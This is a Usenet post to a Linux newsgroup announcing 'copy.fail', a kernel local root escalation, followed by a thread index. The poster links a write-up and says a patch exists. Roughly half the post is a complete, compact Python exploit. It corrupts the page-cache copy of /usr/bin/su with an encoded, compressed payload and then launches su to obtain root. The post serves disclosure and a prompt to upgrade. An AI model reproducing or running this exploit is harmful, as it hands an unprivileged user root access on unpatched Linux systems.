Groups | Search | Server Info | Keyboard shortcuts | Login | Register
Groups > comp.os.linux.misc > #86022
| From | Eli the Bearded <*@eli.users.panix.com> |
|---|---|
| Newsgroups | comp.os.linux.misc |
| Subject | copy.fail |
| Date | 2026-04-30 05:40 +0000 |
| Organization | Some absurd concept |
| Message-ID | <eli$2604300130@qaz.wtf> (permalink) |
This is an instant local escalation to root that works on about nine
years of kernel versions across many, if not all, distros. It's been
patched, very recently, and there is a work-around.
There's a write up at
https://copy.fail/
It works by corrupting the in-memory copy of a program with suid bits,
so no change to the on-disk copy, but relying on multiple processes
hitting the same in memory file cache. The corruption happens becuase
of a kernel bug.
And an example script, under one kilobyte, written for python3 (3.10 or
higher), for reasonable portablity:
https://copy.fail/exp
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
That script's style makes me think the authors may like Perl.
Elijah
------
sleep tight and upgrade your stuff
Back to comp.os.linux.misc | Previous | Next — Next in thread | Find similar
copy.fail Eli the Bearded <*@eli.users.panix.com> - 2026-04-30 05:40 +0000
Re: copy.fail Ralf Fassel <ralfixx@gmx.de> - 2026-04-30 16:39 +0200
Re: copy.fail jayjwa <jayjwa@atr2.ath.cx.invalid> - 2026-04-30 11:25 -0400
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-04-30 19:09 +0000
Re: copy.fail Marc Haber <mh+usenetspam2616@zugschl.us> - 2026-05-01 13:19 +0200
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-01 17:48 +0100
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-05-02 10:28 +0000
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-05-02 12:12 +0000
Re: copy.fail pa@see.signature.invalid (Pierre Asselin) - 2026-05-02 21:46 +0000
Re: copy.fail Lawrence D’Oliveiro <ldo@nz.invalid> - 2026-05-02 23:44 +0000
Re: copy.fail gazelle@shell.xmission.com (Kenny McCormack) - 2026-05-03 01:12 +0000
Re: copy.fail rbowman <bowman@montana.com> - 2026-05-03 02:46 +0000
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-03 09:55 +0100
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-02 23:02 +0100
Re: copy.fail pa@see.signature.invalid (Pierre Asselin) - 2026-05-03 18:11 +0000
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-05-03 23:05 +0100
Re: copy.fail Richard Kettlewell <invalid@invalid.invalid> - 2026-04-30 22:41 +0100
Re: copy.fail Stéphane CARPENTIER <sc@fiat-linux.fr> - 2026-05-01 09:33 +0000
Re: copy.fail Ralf Fassel <ralfixx@gmx.de> - 2026-05-01 23:17 +0200
Re: copy.fail Rich <rich@example.invalid> - 2026-05-06 04:17 +0000
Re: copy.fail Woozy Song <suzyw0ng@outlook.com> - 2026-05-03 11:42 +0800
csiph-web